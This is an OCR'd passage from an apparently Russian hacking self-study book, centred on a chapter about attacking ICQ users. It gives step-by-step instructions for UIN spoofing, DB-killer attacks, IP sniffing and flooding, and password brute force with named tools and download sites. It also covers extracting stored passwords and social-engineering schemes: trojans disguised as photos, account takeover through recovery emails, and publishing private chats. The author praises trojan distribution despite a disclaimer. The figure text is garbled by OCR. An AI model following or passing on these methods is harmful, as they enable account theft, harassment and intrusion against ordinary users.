всего использовать генераторы случайных паролей, подобные предлагаемому
в DnD инструменту.
• Заменяйте пароли доступа к почтовому серверу не реже одного раза в месяц.
• Обязательно обзаведитесь антивирусной программой, поддерживающей контроль почтовых вложений на наличие вирусов — например, Norton Antivirus
или MacAfee VirusScan.
• Чтобы исключить раскрытие конфиденциальности переписки, пользуйтесь
шифрованием — для этого идеально подходит программа PGP Desktop Security.
• Для защиты от спама следует настроить почтовые фильтры, не пропускающие письма с определенными адресами отправителей.
• Наконец, универсальный совет — не будьте ламером, не доверяйте никому, не
открывайте никакие вложения, полученные неведомо откуда неведомо от кого.
Про передачу паролей и прочих закрытых данных по почте в открытом виде
забудьте навсегда — а если требуется переслать хоть сколько-нибудь конфиденциальные данные, применяйте надежное шифрование.

98

Г Л А В А 7.

Хакинг ICQ
Аббревиатура ICQ означает «Intelligent Call Query», что переводится приблизительно как «Интеллектуальный вызов на связь». А еще произношение сокращения
ICQ [Ай-Си-Кью] созвучно фразе: «I Seek You» — «Я ищу тебя»; кроме этого, на
русском языке программу ICQ часто называют просто «аськой». Название ICQ
было присвоено службе Интернета, впервые разработанной и предложенной на
всеобщее употребление в 1998 году компанией Mirabilis, позже продавшей
(за 40 миллионов долларов) свое детище компании AOL.
Служба ICQ известна всем любителям путешествий в Интернете, для которых
ICQ играет роль виртуального пейджера, позволяя связываться со всеми своими
друзьями, которые в данный момент находятся в онлайновом режиме. Путешественник по виртуальным просторам Интернета более не остается в одиночестве везде, где бы он ни был, к нему могут обратиться любые пользователи ICQ, и он
сам может связаться с любым другим путником, сидящим за компьютером в
любой части света. А связавшись друг с другом, можно обменяться сообщениями, переслать друг другу файлы и даже поговорить почти как по телефону — послав голосовое сообщение.
Для работы сервиса ICQ используется сервер, через который происходит поиск
онлайновых собеседников и авторизация клиентов ICQ. Программы клиентов
ICQ можно найти на сайтах, поддерживающих работу ICQ, например,
http://www.ICQ.com, http://mira-bilis.com. Самый известный клиент ICQ так и называется — ICQ с добавлением года создания и версии, например, 1998,1999, 2000,
2002, ныне существует версия ICQ 2003. Для подключения к серверу ICQ клиент
использует порт UDP, номер 4000, а для передачи и приема сообщений — порт
TCP, выделяемый во время сеанса связи.
Каждому клиенту, подключившемуся к сервису ICQ, предоставляется идентификатор UIN (Unique Identification Number — Уникальный идентификационный
номер). Для вызова на связь аськи собеседника достаточно ввести его UTN — и на
компьютере клиента ICQ замигает значок вызова, раздастся звонок или даже голосовое предупреждение о вызове.
Казалось бы, что может быть безобиднее ICQ? Однако в умелых руках сервис
ICQ стал воистину грозным оружием, перед которым пал не один ламерский
компьютер и не один неосторожный пользователь поплатился за длинный язык и
пренебрежение мерами защиты. В чем же тут причина, спросите вы? А вот в чем.

Самоучитель хакера

Агськины
Во-первых, причина особой опасности аськи заключается в предоставлении
пользователям больших возможностей по управлению сеансами связи ICQ, и не
все этими возможностями правильно пользуются. Во-вторых, разработчики клиентов и серверов ICQ плохо спроектировали и реализовали сервис ICQ с точки
зрения безопасности.
Основные угрозы, связанные с сервисом ICQ, таковы:
• Спуфинг, то есть фальсификация UIN посылаемых сообщений, что позволяет
компрометировать своего недруга, рассылая всякую всячину по разным адресам. Это особенно легко сделать, если клиент настроен на получение сообщений ICQ от других клиентов напрямую, минуя сервер — сервис ICQ предоставляет такую возможность. Доказать же, что ты не верблюд, — дело сложное.
• Сетевой хакинг ICQ-клиентов, например, определение IP-адреса своего
ICQ-собеседника, что технически несложно, если общение происходит напрямую. Далее можно воспользоваться разнообразными сетевыми атаками, например, одной из атак DoS, описанных в Главе 9 этой книги. Более того, зная
IP-адрес клиента ICQ, можно совершить полномасштабное вторжение в компьютер доверчивого ламера — определить открытые порты и зафлудить
«аську», или прибегнуть к ICQ-бомберу и забросать клиента ворохом бессмысленных сообщений.
• А какие возможности предоставляет аська для социального мошенничества!
К примеру, втеревшись в доверие к ICQ-собеседнику, можно переслать ему
файл якобы самораспаковывающегося архива якобы с фотографией своей собачки. Запустив полученный файл для «распаковки» архива, вместо загрузки
фотографии пуделя ламер запустит на своем компьютере троянского коня,
который будет сообщать хакеру обо всех действиях ламера, а если этот троянский конь — активный, то и предоставит хакеру средства для удаленного
управления компьютером ламера.
• Уязвимости программного обеспечения клиентов и серверов ICQ, возникшие
по причине пренебрежения программистами компании Mirabilis вопросами
безопасности. Разрабатывая программы и протоколы сервиса ICQ, они оставили в системе защиты ICQ большие дыры, которыми и воспользовались хакеры.
Рассмотрим все эти возможности хакинга по порядку, но вначале поговорим
вот о чем.

100

Хакинг ICQ

Экспериментальная интрасеть
с сервисом ICQ
А теперь о деле. Чтобы не вляпаться по неопытности в какую-либо историю,
настоятельно рекомендуем ознакомиться с возможностями сервиса ICQ и
средств хакинга ICQ на основе локальной сети с установленным сервером и клиентом ICQ. Это создает некоторые неудобства, поскольку многие инструменты
хакинга ICQ созданы для работы исключительно с удаленным соединением; более того, ориентированы на хакинг только отдельных ICQ-серверов (например,
описываемая ниже программа LameToy включает средства исключительно для
хакинга сервера www.mirabilis.com). Тем не менее, настоятельно советуем использовать локальную сеть (а еще лучше ей и ограничиться) наподобие нашей
экспериментальной сети из предыдущей главы, где мы знакомились с хакингом
электронной почты.
Учитывая скандальный характер излагаемого далее материала,
автор вынужден сделать официальное отречение, или, как нынче
говорят, дисклеймер, от всех возможных попыток использования
всех описываемых далее хакерских штучек. Вся изложенная далее
информация служит только для ознакомления пользователей
Интернета с угрозами, присущими сервису ICQ. Автор категорически настаивает на недопустимости использования всех перечисленных средств хакинга по прямому назначению и предупреждает об ответственности.
Построим свою локальную сеть следующим образом. На компьютере Sword-2000
установим сервер ICQ Groupware Server, на компьютерах Alex-З установим
клиент ICQ Groupware Client, который будет исполнять роль хакера с UESf, равным 1001, а на компьютере А1ех-1 установим клиент, который будет исполнять
роль ламера с UIN, равным 1003. Программы сервера и клиента ICQ Groupware
можно найти в Интернете на сайте http://www.icq.com.
Сервис ICQ, реализуемый в локальной сети с помощью программ ICQ
Groupware, имеет некоторые недостатки, однако позволит нам проиллюстрировать
различные угрозы и методы хакинга, применяемые современными «кул хацкерами» наподобие доктора Добрянского из Главы 1. Вообще-то говоря, все описываемые далее методы хакинга ICQ — это полный маразм и отстой, поскольку
реальному хакеру сервис ICQ полезен только как средство выуживания полезных сведений у доверчивых ламеров или для засылки ламерам троянских коней
под видом новогоднего поздравления. Однако приступая к работе с ICQ никому
и никогда не следует забывать о наличии всех этих штучек вроде ICQ-бомберов,
ICQ-флудеров, ICQ-крякеров и тому подобного.

101

Самоучитель хакера

Суть спуфинга UIN заключается в рассылке ICQ-сообщений с подмененным UIN пользуясь знаниями протокола ICQ, хакер создает программу, которая при отсылке сообщения подставляет фиктивный UIN вместо реального. Спуфинг UIN
представляет собой самое настоящее посягательство на права человека в части
ответственности за свои и только за свои поступки. В самом деле, представьте
себе, что кто-то начнет рассылать письма от вашего имени с разного рода инсинуациями по поводу текущих событий и участия в них отдельных личностей.
Отвечать-то придется вам — и кто его знает, чем все обернется.
Чтобы заняться спуфингом, хакеру необходимо специальное программное обеспечение, которое в избытке представлено в Интернете. Наилучшим средством
(судя по отзывам в Интернете) считается программа LameToy for ICQ
(DBKILLER), которую можно найти на различных, пока еще не зачищенных, хакерских сайтах (попробуйте сайт http://icq.cracks.ru/attack.shtml). Работа с программой LameToy for ICQ весьма приятна и необременительна, более того, коекакие функции у программы работают даже в локальной сети. Вкратце опишем
возможности программы LameToy for ICQ.
На Рис. 7.1 представлен диалог, открываемый при запуске программы LameToy for ICQ.
LameToy For Icq [DBKILLER]
| Send [

• Selling-

•Losei-

LLMZ.

I

ЁШШ1ЕЭ

Slop | | Update; | Menu | | Hide [f Exit

JQ044J

Pott ScarmeiГйкЛ-ГпйП |

[Normal Message M
-UlNSniffer-

1ЩЖ.

I Get Local IP 11501

Sendei
miNBIiOOl

[

IPasswdL

l|URL|hHp:/V

Messsage

Puc. 7.1. Диалог LameToy for ICQ (DBKILLER)
предоставляет массу возможностей для хакинга ICQ
Для отправки фальсифицированного сообщения следует только ввести в поле
внизу диалога LameToy for ICQ (DBKILLER) какой-либо текст и щелкнуть на
кнопке Send (Отправить). Если надо, в группе элементов управления Setting
(Настройка) в поле Loop (Цикл) введите число посланий, а в соседнем справа
открывающемся списке выберите тип послания. Чтобы скрыть свой UIN, в поле
UIN# введите какое-либо число или щелкните на кнопке Ran (Random — Случай102

Хаки нг ICQ
ный). Таким образом, получатель вашего послания будет искать обидчика по
адресу, которого, возможно, не существует в природе.
Более интересные штучки, чем рассылка такого рода ICQ-бомб, могут состоять в
отправке кому-либо сообщений, в которых UIN отправителя совпадает с UIN
получателя. Если получатель внесет отправителя таких посланий в свой контактный лист, то при следующем запуске клиента ICQ старых версий (ICQ99a
или ICQ99b) контактный лист будет утерян. Такая атака называется DB-киллер
(или еще интереснее — «киляние аськи»), где DB означает Data Base — база данных, поскольку контактный лист хранится в файле базы данных, помещенной в
каталог DB или NewDB. В программе LameToy такую атаку можно выполнить,
выбрав тип послания DB killer (Убийца DB) из открывающегося списка в группе
элементов управления Setting (Настройка). Защита от таких атак заключается в
использовании новых версий клиента ICQ, и автор настоятельно советует сделать эту операцию незамедлительно.
Программ, которые, подобно LameToy, позволяют фальсифицировать UIN отправителя, превеликое множество, например, System Messenger — одна из программ группы ICQ Team (http://www.icqinfo.ru/softjcqteam.shtml), ICQ Sucker
и другие.

Определение lf~ac)peca и порта ICQ-клиента
Упомянутую выше атаку DoS (как и многие другие) можно выполнить, только
зная ГР-адрес компьютера своей жертвы. Чтобы решить такую задачу, существует
множество хакерских утилит, например, популярная утилита Advanced ICQ IP
Sniffer — одна из программ группы ICQ Team (ее можно найти на многих Webсайтах, например, на http://www.icqinfo.ru/sofl_icqteam.shtml).
На Рис. 7.2 представлен диалог утилиты Advanced ICQ IP Sniffer.

a a a’

Advanced ICQ IP Sniffer
Your UIN: [207685174

| Password: IJ

UIN to check: |123456783

Clear list

Cheek

Saver

Timeout. Tiy again.

Ext IP: |

|

Status: |

|TCPFIa9: |

IntIP: |

|

TCP Pott: |0

| TCP Version: |0

Puc. 7.2. Диалог утилиты-снифера IP-адресов клиентов ICQ

103

Самоучитель хакера
Чтобы получить IP-адрес клиента ICQ по его UIN, программа Advanced ICQ IP
Sniffer подсоединяется к серверу ICQ, используя ваш UIN и пароль. Эти данные следует ввести, соответственно, в поля Your UIN (Ваш UIN) и Password
(Пароль) диалога Advanced ICQ IP Sniffer (Усовершенствованный снифер ГР
клиента ICQ). Последующий щелчок на кнопке Check (Извлечь) в строке справа
от кнопки отображает ход процесса подключения, и если настройки клиента ICQ
с указанным UTN не запрещают передачу такой информации, в разделе Info
(Информация) отобразятся результаты проверки.
Как видим, в разделе Info (Информация) диалога на Рис. 7.2 можно узнать как
внешний, так и внутренний (в локальной сети) IP-адрес клиента ICQ, а также
TCP-порт, который клиент ICQ использует для приема и получения информации. Эти данные отображаются, соответственно, в полях Ext IP (Внешний ГР), Int
IP (Внутренний IP) и TCP Port (Порт TCP). Получив столь исчерпывающие данные, можно приступить к атакам посерьезней рассылки фальсифицированных
ICQ-сообщений (чем мы и займемся чуть ниже).
Сервер ICQ, с которым соединяется программа Advanced IP ICQ Sniffer, указан в диалоге
ICQ server’s address and port (Адрес и порт
сервера ICQ), отображаемом при щелчке мышью на кнопке Server (Сервер) и представленном на Рис. 7.3.

ICQ server’s address and port
Address: licq.rnirdbilis.com
Port:

[4000

|

£3

| |

OK

|

|

Cancel

|

Рис. 7.З. Диалог
ICQ server’s address and port
(Адрес и порт сервера ICQ)

По умолчанию в диалоге ICQ server’s address and port (Адрес и порт сервера ICQ)
указан адрес сервера Mirabilis и стандартный порт подключения к серверу ICQ 4000. Вы можете указать и другие серверы, пробуя различные комбинации адрес/порт для выявления IP-адреса сервера и его порта входящих/исходящих сообщений.

Флудеры ICQ, или, как иногда говорят, ICQ-бомберы, подобны описанным в
предыдущей главе мейлбомберам и предназначены для отправки множества
сообщений на порт ICQ-клиента с целью прекращения или затруднения работы клиента ICQ. Толку от таких атак мало, и их используют по большей части
персонажи наподобие доктора Добрянского, получающие удовольствия от
причинения окружающим мелких гадостей. Однако для полноты изложения
опишем, как работает известный флудер ICQ, входящий в пакет ICQ-MultiWar
(http://www.paybackproductions.com/), который так и называется — ICQ Flooder
(Рис. 7.4).

104

Хакинг ICQ
ICQ Flooder
File
Victim’s address: 127.0.0.1

|

ICQ Port [1027

El Randomly generated UIN
Appatenl source UIN: Q
No. ol Messages: |1

[•••

Message:
Eat this!

ICO Flooder 1.2 Copyright (C) 1998 dph-man and Implant Man

Puc. 7.4. Диалог флудера ICQ
Чтобы воспользоваться флудером ICQ Flooder, выполните такие шаги.
> В поле Victim’s address (Адрес жертвы) введите выявленный IP-адрес
клиента ICQ.
> В поле ICQ-port (Порт ICQ) введите номер порта TCP.
> Укажите, какой UIN отправителя следует включать в сообщения. Имеется два
варианта:
• Случайная генерация UTN — установите флажок Randomly generated UIN
(Генерировать случайные UIN), что приведет к использованию в сообщениях случайных UIN отправителей вместо вашего реального UIN.
• Посторонний UIN отправителя — укажите в поле Apparent source UIN
(Отображаемый UIN отправителя) фиктивный UIN, который будет отображаться клиентом ICQ получателя.
>• В поле со счетчиком No. of Messages (Число сообщений) укажите число отсылаемых ICQ-бомб.
> В поле Message (Сообщение) укажите текст сообщения (что-нибудь простенькое, но со вкусом).
> Щелкните на кнопке Send! (Отослать) и в отобразившемся диалоге понаблюдайте за ходом пересылки сообщений.
Опять-таки повторяем, что все эти флудеры ICQ, как и мейлбомберы, — в лучшем случае орудие возмездия зарвавшемуся «кул хацкеру», но, как справедливо
105

Самоучитель хакера
указано автором одной из статей на сайте http://mht.hut.ru/icq/icq.html, это
отнюдь не инструмент серьезного хакинга (с этой страницы, кстати, можно скачать некоторые связанные с ICQ программы, упомянутые в этой главе). Наилучшее применение ICQ — это рассылка троянских коней, которые далее будут
приносить вам плоды, растущие на чужом огороде, — но отнюдь не затаптывать
этот самый огород!

сервера ICQ
Чтобы получить полный контроль над работой ламера с сервисом ICQ, можно
попробовать взломать доступ к серверу ICQ, воспользовавшись методом прямого перебора паролей доступа, аналогичного применяемому для взлома почтовых
ящиков. С точки зрения криптографии такой метод вполне допустим, если у вас
имеются неограниченные вычислительные ресурсы, а система защиты не отслеживает многократные попытки входа с одного адреса.
Для решения задачи брутафорсинга паролей существует множество утилит, например, ICQ subMachineGun v1.4 (http://icq.cracks.ru/best.shtml), диалог которой представлен на Рис. 7.5.
OICO SubMachineGun vl.4 by uD
File Settings About
[ Bruteforce ]

About
[… [ 13 Single
[~~] П Single

Agent
Force!

||(c) uD . Moscow 2QO1

Puc. 7.5. Утилита ICQ subMachineGun
готова брутафорситъ U1N клиента ICQ

106

Хакинг ICQ
На английском языке метод прямого перебора называется «brute
force» — грубая сила, поэтому на хакерском сленге так и говорят «брутафорсить пароли», когда речь заходит о взломе паролей
доступа путем тупого перебора всех возможных вариантов. Сам
же процесс взлома паролей методом грубой силы называется
«брутафорсингом ».
Для взлома пароля доступа к серверу ICQ с помощью утилиты ICQ subMachineGun
вначале выполните такие шаги по настройки программы.
>•

Запустите утилиту ICQ subMachineGun.

> Выберите команду меню Settings * Connections&Cracking (Подключение&Взлом). На экране появится диалог, представленный на Рис. 7.6.
icq server

port

[ Cracking ]
13 Stop if successful…
ЕЭ Make log of cracked uins
0 Reconnect if timeout
0 Cut passwds length to 8 digits
set timeout:
relogln ;

times

Cancel

OK

Puc. 7.6. Настройка утилиты взлома U1N
В поле icq server (Сервер ICQ) укажите адрес сервера ICQ, намеченного для
взлома, или оставьте стандартную установку ICQLmirabilis.server.
В поле port (порт) укажите порт подключения к серверу или оставьте стандартное значение 4000.
В группе элементов управления Cracking (Взлом) установите флажки режима
взлома:
• Установка флажка Stop if successful (Остановиться при успехе) останавливает дальнейший перебор паролей после успешной регистрации на
сервере ICQ.
• Установка флажка Make log if cracked uins (Записывать в журнал взломанные UIN) приводит к записи в журнальный файл всех взломанных паролей доступа к серверу ICQ.
107

Самоучитель хакера
• Установка флажка Reconnect if timeout (Восстановить соединение после
простоя) вынуждает утилиту восстанавливать соединение с сервером ICQ
после простоя.
• Установка флажка Cut password length to 8 digits (Ограничить длину пароля
8-ю цифрами) ограничивает длину проверяемых паролей 8-ю цифрами.
>• В поле со счетчиком set timeout (установить время простоя) укажите время ожидания отклика сервера на запрос или оставьте стандартное значение 15 сек.
>• В поле relogin (повторный вход) укажите число попыток входа в сервер ICQ
или оставьте стандартное число 3.
После настройки утилиты ICQ subMachineGun следует выполнить настройку
генераторов взламываемых UIN и тестируемых паролей. С этой целью выполните такие шаги.
> В главном диалоге утилиты ICQ subMachineGun в разделе Bruteforce
(Прямой перебор) установите режим генерации взламываемых UIN. Для этого выберите одну из двух возможностей.
• Установите верхний флажок Single
(Одиночный) для проверки единственного UIN, который следует ввести
в поле слева от флажка.
• Сбросьте нижний флажок Single
(Одиночный) для генерирования UIN.
Если выбран режим генерирования UIN,
щелчком на верхней кнопке с тремя точками (…) отобразите диалог Making victims list (Генерация списка жертв), представленный на Рис. 7.7.
В диалоге Making victims list (Генерация
списка жертв) в поля раздела Range (Диапазон) последовательно, в порядке сверху
вниз, введите нижнюю границу проверяемых UIN (умолчание — 100000) и верхнюю
границу (умолчание 900900).

I Hint: use Del to remove uins from list

Puc. 7.7. Выбор режима генерации
взламываемых UIN

В поле step (шаг) введите шаг приращения

значений UIN (умолчание — 100).
Щелкните на кнопке Generate (Генерировать) и генерируйте UIN; результат
отобразится в левой части диалога.

108

Хакинг ICQ
Если необходимо, можете в поле сверху кнопки Generate (Генерировать) ввести
какой-либо UIN, который вы нашли в контактных листах, в Интернете, и т.д.
Щелчок на кнопке Add (Добавить) добавит указанный UIN к списку слева.
>• Если у вас имеется текстовый файл со списком UIN, откройте его с помощью
кнопки Open (Открыть) и пополните список проверяемых UIN (в файле каждый UIN помещается в отдельную строку).
> Чтобы удалить какой-либо UIN из списка, щелкните на нем в отображаемом
списке и нажмите на клавишу t0*»!. Кнопка Clear (Очистить) позволяет очистить список проверяемых UIN (это позволяет начать все заново).
Завершив создание списка UIN, щелкните на кнопке ОК.
Теперь настроим список тестируемых паролей.
> В главном диалоге утилиты ICQ subMachineGun в группе элементов управления Bruteforce (Грубая сила) установите режим генерации тестируемых
паролей. Для этого выберите одну из двух возможностей.
• Установите верхний флажок Single (Одиночный) для проверки единственного пароля, который следует ввести в поле слева от флажка.
• Сбросьте нижний флажок Single (Одиночный) для генерирования паролей.
>• Если выбран режим генерирования паролей, то
щелчком мыши на верхней кнопке с тремя точками (…) отобразите диалог Make passlist
(Создать список паролей), представленный на
Рис. 7.8.
В диалоге Make passlist (Создать список паролей)
для генерирования списка паролей имеется две
возможности.
> Щелкните на кнопке Open (Открыть) и выберите текстовый файл со списком паролей (каждый
пароль в отдельной строке). Это наилучшая
возможность взлома — используя файл со списком наиболее часто используемых паролей,
можно попытаться с помощью нескольких сотен попыток найти пароль неопытного пользователя ICQ.

Use Del to remove passwords from list

Puc. 7.8. Диалог
генерирования паролей

v Введите свой пароль в поле над кнопкой Generator (Генератор) и щелкните
на кнопке Add (Добавить). Последовательно повторяя эту процедуру, пополните список паролей.
109

Самоучитель хакера
> Чтобы удалить какой либо пароль из списка, щелкните на нем в отображае0
мом списке и нажмите на клавишу К *»**]. Кнопка Clear (Очистить) позволяет
очистить список проверяемых паролей (чтобы начать все заново).
>• Завершив создание списка паролей, щелкните на кнопке ОК.
Теперь все готово для взлома. Подсоединяемся к Интернету и щелкаем на
кнопке Force (Ломать). Если вам повезет, то в нижней части диалога ICQ
subMachineGun v1.4 отобразится взломанный пароль (Рис. 7.9).
OICQ SubMachineGun vl 4 by uD
File Settings About

[ Bruteforce ]

About

[Г] 0 Single
[~~] D Single

Agent

Puc. 7.9. Пароль взломан — для конфиденциальности
он отображен несколько размытым
Чтобы продемонстрировать вам работу утилиты ICQ subMachineGun v1.4, автор
попросту использовал свой UIN, добавив к списку стандартных паролей собственный пароль (исходя из соображений конфиденциальности, этот пароль отображен на Рис. 7.9 заретушированным). Как видим, взлом выполнен с помощью
трех попыток на каждый пароль, и каждая попытка заняла 15 сек, потраченных
на ожидание отклика сервера ICQ. Так что теперь вы можете реально оценить
свои возможности — 45 сек на каждый пароль означают несколько часов непрерывного брутафорсинга паролей в онлайновом режиме, если список паролей
имеет приемлемую длину (не более нескольких сотен паролей). В принципе,
учитывая наличие в Интернете большого числа неопытных пользователей с паролями, составленными из имен людей, домашних животных, названий автомобилей, имен популярных артистов и т.д. — шансы у настойчивого хакера неплохие.
Было бы за что бороться…
110

Хакинг ICQ

(ССНкрякеры
И все-таки, что там ни говори, брутафорсинг сервера ICQ — вещь достаточно
трудоемкая. Если пользователь сервиса ICQ не поленится ввести пароль достаточной длины и сложности, то удаленный взлом сервера ICQ простым перебором паролей становится практически невозможным. Так что же, сдаться и
признать свое бессилие? Не тут-то было! Если вам не удается лобовая атака,
почему бы не поискать обходные пути? Например, можно отослать своему
ICQ-собеседнику исполняемый файл и попробовать убедить его, что это самораспаковывающийся архивный файл с фотографией его собачки. Клюнувший на
эту приманку ламер вместо фотографии собачки обзаведется на своем компьютере троянским конем, да еще и снабженным средствами удаленного управления
компьютером.
Что же может последовать за таким событием? Хакер приобретает возможность исследовать компьютер ламера так, как будто сидит за его консолью и
исследует файловую систему хакнутого компьютера проводником Windows.
Теперь хакер может применить весь инструментарий для взлома локального
компьютера, о котором мы говорили ранее в этой книге. В частности, можно
извлечь пароли доступа к сервису ICQ из локальных файлов, хранящихся в
папке с установленной программой клиента ICQ. Для такого рода процедуры
имеется множество программ ICQ-крякеров, например, очень интересная
программа фирмы ElcomSoft под названием Advanced ICQ Password Recovery
(http://www.elcomsoft.com).
Работа с этой программой легка и приятна, поскольку делать ничего не надо.
На Рис. 7.10 представлено рабочее окно программы Advanced ICQ Password
Recovery.

31.01.2003 Ш 2:05 — ACQPR1.0 launched, registered version

6.COPR 1.0 (cl 2000 Plea Goriunov and Andy Malvshev. ElcomSofl Co. L

Puc. 7.10. Рабочее окно утилиты извлечения паролей ICQ из файлов .dat
Чтобы взломать пароль клиента ICQ, щелкните на значке папки в левой верхней части диалога Advanced ICQ Password Recovery (Усовершенствованное
восстановление паролей ICQ) и в стандартном диалоге открытия файла найдите файл .dat, хранящий пароли клиента ICQ.
111

Самоучитель хакера
У разных клиентов этот файл хранится в
разных папках, например, у клиента ICQ
2002а эта папка называется 2002а. Папка
2002а хранит файл с именем, составленным из номера UIN и расширения .dat,
т.е., в данном случае, 207685174.dat
(207685174 — это UIN автора). Выбор этого файла приводит к появлению диалога
ICQ Password successfully found! (Пароль ICQ успешно найден), отображающего восстановленный пароль (Рис. 7.11).

ICQ Password successfully found !
ICQ version:
99b-2000b
UIN password:

% Copy to Clipboard

fij Close

Puc. 7.11. Пароль успешно
восстановлен!

Хотя диалог на Рис. 7.11сообщает, что эта версия программы предназначена для
работы с клиентами ICQ версий 99b — 2000b, она успешно справилась с клиентом ICQ 2002а (пароль заретуширован из соображений конфиденциальности).
Так что задача хакера, желающего взломать сервис ICQ попавшегося под руку
ламера, весьма проста — нужно добраться до его компьютера либо локально, либо удаленно — и применить ICQ-крякер. Возможностей тут множество — локальный доступ к компьютеру, загрузка троянов, отправка почты с активным вложением (см. [11]), атака на Web-клиента (см. Главу 8). Все это очень интересно, но
тут есть и универсальный метод, называемый социальной инженерией, так что
обсудим и эту тему.

Методы социальной инженерии
Как везде и всюду, наиболее эффективным инструментом хакинга сервиса ICQ
(и не только) является социальная инженерия, попросту мошенничество. Конечно, при наличии достаточно больших вычислительных ресурсов, быстрой линии
связи и хорошей программы брутафорсинга паролей, можно пойти в лобовую
атаку на сервер ICQ. В этом случае, рано или поздно, но вы можете получить
пароль доступа к сервису ICQ какого-либо ламера, забывшего основной принцип
компьютерной безопасности — использование сложных паролей и их частую замену. Однако такую задачу можно решить и иным, более эффективным путем.
Когда вы настраиваете свой клиент ICQ, от вас требуется ввести свой почтовый
адрес. Некоторые пользователи считают эту процедуру пустяковой и указывают
вместо реально существующего адреса электронной почты вымышленный адрес. Так вот, учтите, что если хакер при обследовании списка ICQ-клиентов найдет такой вымышленный почтовый адрес — взлом доступа к сервису ICQ владельца этого адреса не вызывает никаких проблем. Дело в том, что именно на
указанный при регистрации адрес электронной почты сервер ICQ высылает пароль, если обладатель UIN воспользуется средствами сервера для восстановления пароля регистрации на сервере. А теперь подумайте — что помешает хакеру
112

Хакинг ICQ
создать почтовый ящик с таким вымышленным почтовым адресом и запросить
сервер об отправке ему якобы забытого пароля?
Так что вы, наверное, поняли, в чем состоит суть социальной инженерии — выведывание всеми методами у своей жертвы любой информации, помогающей
взломать доступ к информационным ресурсам компьютера. Привычки, пристрастия, поведение жертвы — все имеет значение, поскольку, к примеру, зная, что
вы любите животных, можно предположить, что при выборе пароля вы используете имя своей собачки — а ведь список имен для животных отнюдь не бесконечен. Поскольку ICQ — это способ непосредственного, живого общения, человек,
обладающий элементарными навыками в психологии, может так «заговорить»
своего собеседника, что он согласится принять от него исполняемый файл, разболтает все, что знает и не знает, после чего этому ламеру останется только подсчитывать убытки.
Другой аспект социального мошенничества — это устройство «заподлянки»,
т.е. такой такой ловушки для пользователя ICQ, после которой ему, возможно,
придется менять свой образ жизни. Например, можно отослать двум клиентам
ICQ приглашение на беседу и запустить у себя на компьютере программу ICQ,
позволяющую работать одновременно с двумя клиентами ICQ (для такого рода
манипуляции имеется даже программа, входящая в пакет ICQ Team
(http://www.lcqteam.com)). Далее беседа с одним ICQ-собеседником ведется через первый клиент ICQ, а с другим ICQ-собеседником — через второй клиент ICQ.
Содержание беседы немедленно публикуется на общедоступном чате на потеху
окружающим — мало ли что там может быть сказано, побывайте на наших чатах.
Правда, неплохо придумано? Как говорила героиня популярной комедии,
«скромненько, но со вкусом». А что, если эти «собеседники» будут обсуждать
что-то очень интимное, а в контактных листах указаны их настоящие идентификационные данные? А что, если все это потом… Ну да ладно, умные люди уже
все поняли, а всем прочим понять простые вещи удается только после некоторых приключений, и то не всегда.
Так что будучи в Интернете и общаясь в кругу ICQ-собеседников, помните — вы
находитесь в зоне повышенного внимания со стороны всяких разных докторов
Добрянских и им подобных персонажей, вполне способных учинить большие
неприятности.

Заключение
Сервис ICQ играет для хакинга весьма большое значение, однако не все хакеры правильно понимают открывающиеся перед ними возможности. Основное предназначение ICQ для серьезного хакера — это сбор полезной информации о своих жертвах,
а также распространение троянских коней и прочих хакерских инструментов

113

Самоучитель хакера
по компьютерам ICQ-собеседников. А вот бомбардировка первых попавшихся
клиентов ICQ бессмысленными посланиями и проделывание с ними всяких штучек типа атак DoS или разрушения чатов… Все подобные действия не имеют
никакой рациональной подоплеки и должны быть морально осуждены.
Для антихакера описанные в этой главе методы хакинга ICQ интересны по двум
причинам. Во-первых, антихакеру следует знать о наличие таких возможностей,
как ICQ-флудинг, ICQ-спуфинг, ICQ-крякинг и тому подобного. Назначая пароли
для регистрации на серверах ICQ, всегда следует помнить о возможности взлома
простого пароля с последующей фальсификацией сообщений или разрушения
доступа к сервису ICQ. А выяснивший ваш IP-адрес хакер запросто может предпринять сетевую атаку, когда вы будете общаться с ним по прямому доступу,
минуя сервер ICQ. О возможностях социального мошенничества по дискредитации пользователя ICQ уж и говорить не хочется.
Так что перед тем, как вы войдете в ICQ-сообщество, предпримите меры защиты отмените все неавторизованные включения вашего UTN в контактные листы и
ни в коем случае не указывайте в идентификационных данных реальные сведения о себе самом. Далее, общаясь с ICQ-собеседником, всегда запускайте программу-брандмауэр, например, BlacklCE Defender, чтобы избежать возможной
атаки DoS. И самое главное — никогда не принимайте от неизвестных людей
файлы, особенно исполняемые, под каким бы предлогом вам их ни навязывали.
В крайнем случае, проверяйте полученные файлы на наличие вирусов и перед
использованием запускайте на тестовых компьютерах. Помните, что столбовая
дорога троянских коней в ваш компьютер лежит через клиент ICQ — для хакера
это наилучший способ втереться в доверие к тупому ламеру и заставить его запустить на компьютере хакерскую программу.
Во-вторых, антихакеру неплохо бы перенять кое-какие инструменты хакинга
ICQ, чтобы противостоять атакам из Интернета на своего клиента ICQ. Например, зная IP-адрес своего ICQ-собеседника, можно контролировать его действия
по полной программе — вплоть до открытого предупреждения о своих возможностях. Это действует весьма отрезвляюще на господ типа доктора Добрянского,
не говоря уж о прочих достоинствах такой активной обороны.
Наконец, последний совет. Если вам очень потребуется использовать ICQ для секретных переговоров, можете воспользоваться программой PGP Desktop Security 2.9,
которая предоставляет средства шифрования передаваемых ICQ-сообщений
открытыми ключами собеседников. Это весьма удобное средство, достаточно
эффективно защищающее переговоры при условии использования подписанных
открытых PGP-ключей (подробнее об этом можно прочитать в [7]).

114

Г Л А В А 8.

Хакинг Web-caumoft
Что же хакер может извлечь из Web? В начале книги мы уже писали, что Web
служит для хакера одним из основных источников информации, необходимой
для успешного выполнения атаки на компьютерные системы. На Web-страничках
хакер может найти телефоны организации, адреса электронной почты сотрудников организации и адреса Web-сайтов филиалов организации и ее партнеров.
Все это весьма ценная вещь, требуемая для выполнения атак на почтовые клиенты, для сканирования телефонов организации с целью удаленного взлома доступа к корпоративной сети, или других задач.
Далее, очень часто хранящаяся на Web-серверах информация содержит много
такого, что не связано напрямую с предоставлением информации посетителям, а
оставшееся, например, вследствие недосмотра разработчиков сайта. Очень часто
в комментариях внутри кода HTML Web-страничек можно найти указания на
фамилии разработчиков (а это — логин для попыток входной регистрации), их
телефоны, адреса электронной почты. Ссылки в коде HTML на ресурсы сайта
содержат сведения о структуре каталогов сервера. Применяемые для работы
сайта сценарии также не лишены недостатков и подчас позволяют проникать на
серверный компьютер за счет элементарных ошибок программирования (на этом
основаны описываемые далее атаки переполнения буфера).
